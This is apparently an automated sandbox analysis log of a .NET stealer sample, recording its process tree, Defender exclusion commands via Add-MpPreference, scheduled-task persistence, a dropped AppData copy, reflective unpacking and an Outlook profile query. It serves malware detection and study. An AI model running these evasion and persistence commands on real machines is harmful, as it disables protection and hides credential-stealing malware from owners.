Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: sKdvLcn.pdb source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr
Source:	Binary string: sKdvLcn.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs	.Net Code: bKmRjtHvbX System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs	.Net Code: bKmRjtHvbX System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.2df41e8.5.raw.unpack, Ar.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_02BFA448 pushad ; ret	0_2_02BFA449
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_0B7F37DD push FFFFFF8Bh; iretd	0_2_0B7F37DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D0708 push eax; ret	9_2_030D0712
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D0718 push eax; ret	9_2_030D0722
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D0728 push eax; ret	9_2_030D0732
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D06C8 push eax; ret	9_2_030D0702
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_06FD8FF0 pushfd ; retf	9_2_06FD8FFD
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0176A44A push eax; ret	10_2_0176A451
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0176A448 pushad ; ret	10_2_0176A449
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0A6824B5 push FFFFFF8Bh; iretd	10_2_0A6824B7
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01330718 push eax; ret	14_2_01330722
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01330708 push eax; ret	14_2_01330712
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01330698 push eax; ret	14_2_01330712
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01330698 push eax; ret	14_2_01330732
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_013306C8 push eax; ret	14_2_01330702

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Static PE information: section name: .text entropy: 7.900652138585597
Source: lnYkIr.exe.0.dr	Static PE information: section name: .text entropy: 7.900652138585597

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, Y2xhaHzpVWr0qPqPe5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roQ0oNhaND', 'lcA0r2LlDp', 'JmR0BjiLGy', 'r7j06otRwI', 'Rld0vHVUtW', 'u2W00jaLyM', 'vUR0VAneCa'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, uSWedTON0pZsaQDlE7.cs	High entropy of concatenated method names: 'ToString', 'iZ0BiQxM4I', 'q9fBW589D3', 'ClfBK3sN1E', 'voJBFrTTpT', 'dWcBtSjELU', 'bZFBkQ4i6N', 'r9gBLrNNRg', 'TrvB3jjSVx', 'sHnB7jH9XC'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, elDDp3HPIobioVFnqi.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YwKpwJPng2', 'S17pZGW9R2', 'I5bpzOhQuE', 'sDcUagCe6e', 'odeU4Rf2mD', 'rxXUpLgTRe', 'EssUUmSCYJ', 'bCWWOwWwyoxWFlxFFKx'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, M4CJD2cOceSjToPAu1.cs	High entropy of concatenated method names: 'Dispose', 'xhe4weBFJG', 'j8mpWwc3T2', 'cMP88Ct8gZ', 'p0R4ZcEy9O', 'BwT4zCDIhE', 'ProcessDialogKey', 'ffYpa9cqyC', 'LGFp4gxtdi', 'fSIppoAiv9'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AcxjPt4arkHdo90ERvm.cs	High entropy of concatenated method names: 'WHZ0Y7UAYp', 'jrI0DX47wT', 't560jFmNWg', 'Tdf0GVBV7U', 'E3V0Tm4ohL', 'dF00ut0IWl', 'pCS0beK32v', 'gfV0mi2gdM', 'JJh0fAhUNL', 'kIW0ximueC'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, B54uhvmGLlyX4pN6ow.cs	High entropy of concatenated method names: 'km7c9pvgod', 'uJQc1iuFU4', 'KY3cOURNCJ', 'SQ8c8g1akg', 'T3mce2YRgE', 'nhvcPQCilT', 'QJEcAHfxIT', 'inHcCRUX4X', 'tM8cwj5Tli', 'YGYcZPKRTh'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, fRACX4xPO18mSo9ekl.cs	High entropy of concatenated method names: 'Fev5TXYnxG', 'aYj5b2WIDw', 'JKtHKxoYAF', 'VbhHFwxNwF', 'hOYHtZK4TB', 'bYSHk2pKrb', 'EwgHLaLNrR', 'B63H39SR9M', 'OriH7W8Nnt', 'f7FHQUvLyg'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, x9cqyCwLGFgxtdilSI.cs	High entropy of concatenated method names: 'XcRvghc9G9', 'pTRvW0XQGp', 'eifvKRW8v1', 'JTEvFmrXYI', 'L3dv9mcStw', 'dLZvtuncme', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, zXIgiB4p7fQ4TwLhUoH.cs	High entropy of concatenated method names: 'rp6VYRi78Y', 'UtQVDMbRuX', 'FBCVj9GjLv', 'CrENuxqmAvX5aN6qVXI', 'kB9XioqlMlTn2Bnlx4O', 'j3hP9mqU4NI7DPrbyEn', 'whYvyGqHoFbWlwooZIg', 'AsjXpGqhchxZPA5MwYJ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, uOikXZRACP8fm5xu2c.cs	High entropy of concatenated method names: 'aTT4X54uhv', 'ALl4yyX4pN', 'LRY4n2JI2y', 'mOJ42NcRAC', 'o9e4rklstO', 'wZ64BREl3C', 'gcQpHNSptCWOA1KF2T', 'IMjPbHXN7HF8MSfHvM', 'DDqnfhK3LoRQZO0GN3', 's7n440L0DI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, TR2kGu4UvRae0cmEBUc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kvSV9ZgSr9', 'syAV19mfbk', 'wLEVOhgnGP', 'yd4V89D8po', 'ETTVeuKvZc', 'yppVPVZwtT', 'Ah2VAbIqRm'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, nAiv9FZhRaIO79efY1.cs	High entropy of concatenated method names: 'gRN04fHUox', 'XGV0UkMy5P', 'kxH0RKSDmf', 'cQZ0lfhQ8E', 'JRW0cQOaaI', 'vEa0557Qof', 'rSE0q5rF74', 'PFHvA7gNGu', 'lZ4vCja3i0', 'FZavwxALT8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, Pp43I3Lx3ZeQKe9E6s.cs	High entropy of concatenated method names: 'u6VXlU1R5c', 'J8nXHmrjgR', 'XR5Xqa2Wv1', 'RT8qZIhcVO', 'HEwqzFlFYv', 'EWSXaCQ2bt', 'wMQX4Bj2m7', 'A2kXpUOqa8', 'IvHXUL3aht', 'ho4XRXPJEB'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, JLNnh3fRY2JI2y2OJN.cs	High entropy of concatenated method names: 'A1AHGKQuBb', 'znyHu9wWGF', 'nXyHmjocTE', 'NOZHfjKQwo', 'fTeHrCR8pG', 'aHHHBh0ugJ', 'iB5H6VcOWw', 'hL4HvLX7Oh', 'u0dH042vfl', 'otUHVhaswq'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, on1bXYpw5Dbt7hdRmA.cs	High entropy of concatenated method names: 'jI5jAjCsp', 'n4MGAO8y8', 'lKLu3MNcl', 'zgebgMICY', 'N9xfdKXkw', 'sitx1i0Ll', 'wK3r1VbqTIt5tiuQW8', 'SQrl8eM5xUsxDs6ssa', 'VLMv7dgJ3', 'o4eVT5g5a'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, sRcEy9COTwTCDIhElf.cs	High entropy of concatenated method names: 'eJYvlbRXO3', 'ifQvcQRBXp', 'iJfvHoAOC8', 'CUNv5Qn3OQ', 'Y1bvqBKdpY', 'pCbvX0TrET', 'ss7vyYGxcH', 'ppBvMvj5nX', 'HFpvneeUBa', 'WAxv2LNKH5'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, MpRDFV9vBfpQsVwLWj.cs	High entropy of concatenated method names: 'aqFrQfQgKJ', 'kZErdK5u6F', 'KgYr9fmW8V', 'Y1pr15Iaa4', 'Oc1rWdX656', 'MydrKEYhBH', 'HQIrFgDEd0', 'P6urtEsei6', 'Gl0rk2I74F', 'WsPrL85ksI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, utOIZ6gREl3CLe8Wuc.cs	High entropy of concatenated method names: 'qbSqNrJ7hr', 'RoRqc0CcKI', 'RU4q5LUNF1', 'TUWqXx9ef6', 'JSVqyrfu5U', 'kNG5etL0tI', 'B295PpbTtm', 'Jxm5AFjrh8', 'gSP5Cdhj5c', 'MNs5whkM6i'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, XfKWYy7qoSjnocn2Mt.cs	High entropy of concatenated method names: 'O94XYZHcjr', 'X47XD1YLTJ', 'YLHXjfOs2r', 'FMVXGT1p6M', 'VyRXT44A0r', 'Q5xXuvGTdW', 'B9yXbYtbF3', 'GVvXmbeyAZ', 'kcWXf8hTTc', 'R9uXx8tKPn'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, FRpcSaPxFAS6APJwiL.cs	High entropy of concatenated method names: 'vZt6C9cFrE', 'F4J6ZmrGnO', 'NnbvatH592', 'hWPv44IDVX', 'G576iY7Bir', 'r7B6dtrD59', 'FsS6ErAqvc', 'vfN69Dl8MI', 'oYj61ddqAd', 'awF6OnjUEx'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs	High entropy of concatenated method names: 'adFUNab2jZ', 'WcnUlluGJ4', 'y7nUcJZChw', 'W9WUHKPyNM', 'vH5U5c3PMp', 'AnvUq5kUVi', 'vQgUXaYRU9', 'Q0uUyj96IC', 'S5qUMloObW', 'mhAUnu9DPI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, f1PYmeE4fTIbqTOcMr.cs	High entropy of concatenated method names: 'bSQomyY0Rs', 'zyuoftb2np', 'DdLogIanfF', 'WFfoWSOW13', 'HEuoFkuIsC', 'JKDotqgu6i', 'rPQoLF19BS', 'gVso3BvOH6', 'oIUoQYeuAo', 'djCoi2l0ts'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, Y2xhaHzpVWr0qPqPe5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roQ0oNhaND', 'lcA0r2LlDp', 'JmR0BjiLGy', 'r7j06otRwI', 'Rld0vHVUtW', 'u2W00jaLyM', 'vUR0VAneCa'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, uSWedTON0pZsaQDlE7.cs	High entropy of concatenated method names: 'ToString', 'iZ0BiQxM4I', 'q9fBW589D3', 'ClfBK3sN1E', 'voJBFrTTpT', 'dWcBtSjELU', 'bZFBkQ4i6N', 'r9gBLrNNRg', 'TrvB3jjSVx', 'sHnB7jH9XC'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, elDDp3HPIobioVFnqi.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YwKpwJPng2', 'S17pZGW9R2', 'I5bpzOhQuE', 'sDcUagCe6e', 'odeU4Rf2mD', 'rxXUpLgTRe', 'EssUUmSCYJ', 'bCWWOwWwyoxWFlxFFKx'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, M4CJD2cOceSjToPAu1.cs	High entropy of concatenated method names: 'Dispose', 'xhe4weBFJG', 'j8mpWwc3T2', 'cMP88Ct8gZ', 'p0R4ZcEy9O', 'BwT4zCDIhE', 'ProcessDialogKey', 'ffYpa9cqyC', 'LGFp4gxtdi', 'fSIppoAiv9'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AcxjPt4arkHdo90ERvm.cs	High entropy of concatenated method names: 'WHZ0Y7UAYp', 'jrI0DX47wT', 't560jFmNWg', 'Tdf0GVBV7U', 'E3V0Tm4ohL', 'dF00ut0IWl', 'pCS0beK32v', 'gfV0mi2gdM', 'JJh0fAhUNL', 'kIW0ximueC'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, B54uhvmGLlyX4pN6ow.cs	High entropy of concatenated method names: 'km7c9pvgod', 'uJQc1iuFU4', 'KY3cOURNCJ', 'SQ8c8g1akg', 'T3mce2YRgE', 'nhvcPQCilT', 'QJEcAHfxIT', 'inHcCRUX4X', 'tM8cwj5Tli', 'YGYcZPKRTh'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, fRACX4xPO18mSo9ekl.cs	High entropy of concatenated method names: 'Fev5TXYnxG', 'aYj5b2WIDw', 'JKtHKxoYAF', 'VbhHFwxNwF', 'hOYHtZK4TB', 'bYSHk2pKrb', 'EwgHLaLNrR', 'B63H39SR9M', 'OriH7W8Nnt', 'f7FHQUvLyg'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, x9cqyCwLGFgxtdilSI.cs	High entropy of concatenated method names: 'XcRvghc9G9', 'pTRvW0XQGp', 'eifvKRW8v1', 'JTEvFmrXYI', 'L3dv9mcStw', 'dLZvtuncme', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, zXIgiB4p7fQ4TwLhUoH.cs	High entropy of concatenated method names: 'rp6VYRi78Y', 'UtQVDMbRuX', 'FBCVj9GjLv', 'CrENuxqmAvX5aN6qVXI', 'kB9XioqlMlTn2Bnlx4O', 'j3hP9mqU4NI7DPrbyEn', 'whYvyGqHoFbWlwooZIg', 'AsjXpGqhchxZPA5MwYJ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, uOikXZRACP8fm5xu2c.cs	High entropy of concatenated method names: 'aTT4X54uhv', 'ALl4yyX4pN', 'LRY4n2JI2y', 'mOJ42NcRAC', 'o9e4rklstO', 'wZ64BREl3C', 'gcQpHNSptCWOA1KF2T', 'IMjPbHXN7HF8MSfHvM', 'DDqnfhK3LoRQZO0GN3', 's7n440L0DI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, TR2kGu4UvRae0cmEBUc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kvSV9ZgSr9', 'syAV19mfbk', 'wLEVOhgnGP', 'yd4V89D8po', 'ETTVeuKvZc', 'yppVPVZwtT', 'Ah2VAbIqRm'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, nAiv9FZhRaIO79efY1.cs	High entropy of concatenated method names: 'gRN04fHUox', 'XGV0UkMy5P', 'kxH0RKSDmf', 'cQZ0lfhQ8E', 'JRW0cQOaaI', 'vEa0557Qof', 'rSE0q5rF74', 'PFHvA7gNGu', 'lZ4vCja3i0', 'FZavwxALT8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, Pp43I3Lx3ZeQKe9E6s.cs	High entropy of concatenated method names: 'u6VXlU1R5c', 'J8nXHmrjgR', 'XR5Xqa2Wv1', 'RT8qZIhcVO', 'HEwqzFlFYv', 'EWSXaCQ2bt', 'wMQX4Bj2m7', 'A2kXpUOqa8', 'IvHXUL3aht', 'ho4XRXPJEB'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, JLNnh3fRY2JI2y2OJN.cs	High entropy of concatenated method names: 'A1AHGKQuBb', 'znyHu9wWGF', 'nXyHmjocTE', 'NOZHfjKQwo', 'fTeHrCR8pG', 'aHHHBh0ugJ', 'iB5H6VcOWw', 'hL4HvLX7Oh', 'u0dH042vfl', 'otUHVhaswq'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, on1bXYpw5Dbt7hdRmA.cs	High entropy of concatenated method names: 'jI5jAjCsp', 'n4MGAO8y8', 'lKLu3MNcl', 'zgebgMICY', 'N9xfdKXkw', 'sitx1i0Ll', 'wK3r1VbqTIt5tiuQW8', 'SQrl8eM5xUsxDs6ssa', 'VLMv7dgJ3', 'o4eVT5g5a'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, sRcEy9COTwTCDIhElf.cs	High entropy of concatenated method names: 'eJYvlbRXO3', 'ifQvcQRBXp', 'iJfvHoAOC8', 'CUNv5Qn3OQ', 'Y1bvqBKdpY', 'pCbvX0TrET', 'ss7vyYGxcH', 'ppBvMvj5nX', 'HFpvneeUBa', 'WAxv2LNKH5'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, MpRDFV9vBfpQsVwLWj.cs	High entropy of concatenated method names: 'aqFrQfQgKJ', 'kZErdK5u6F', 'KgYr9fmW8V', 'Y1pr15Iaa4', 'Oc1rWdX656', 'MydrKEYhBH', 'HQIrFgDEd0', 'P6urtEsei6', 'Gl0rk2I74F', 'WsPrL85ksI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, utOIZ6gREl3CLe8Wuc.cs	High entropy of concatenated method names: 'qbSqNrJ7hr', 'RoRqc0CcKI', 'RU4q5LUNF1', 'TUWqXx9ef6', 'JSVqyrfu5U', 'kNG5etL0tI', 'B295PpbTtm', 'Jxm5AFjrh8', 'gSP5Cdhj5c', 'MNs5whkM6i'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, XfKWYy7qoSjnocn2Mt.cs	High entropy of concatenated method names: 'O94XYZHcjr', 'X47XD1YLTJ', 'YLHXjfOs2r', 'FMVXGT1p6M', 'VyRXT44A0r', 'Q5xXuvGTdW', 'B9yXbYtbF3', 'GVvXmbeyAZ', 'kcWXf8hTTc', 'R9uXx8tKPn'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, FRpcSaPxFAS6APJwiL.cs	High entropy of concatenated method names: 'vZt6C9cFrE', 'F4J6ZmrGnO', 'NnbvatH592', 'hWPv44IDVX', 'G576iY7Bir', 'r7B6dtrD59', 'FsS6ErAqvc', 'vfN69Dl8MI', 'oYj61ddqAd', 'awF6OnjUEx'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs	High entropy of concatenated method names: 'adFUNab2jZ', 'WcnUlluGJ4', 'y7nUcJZChw', 'W9WUHKPyNM', 'vH5U5c3PMp', 'AnvUq5kUVi', 'vQgUXaYRU9', 'Q0uUyj96IC', 'S5qUMloObW', 'mhAUnu9DPI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, f1PYmeE4fTIbqTOcMr.cs	High entropy of concatenated method names: 'bSQomyY0Rs', 'zyuoftb2np', 'DdLogIanfF', 'WFfoWSOW13', 'HEuoFkuIsC', 'JKDotqgu6i', 'rPQoLF19BS', 'gVso3BvOH6', 'oIUoQYeuAo', 'djCoi2l0ts'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.70d0000.13.raw.unpack, ReactionVessel.cs	High entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.30790cc.3.raw.unpack, ReactionVessel.cs	High entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File created: C:\Users\user\AppData\Roaming\lnYkIr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
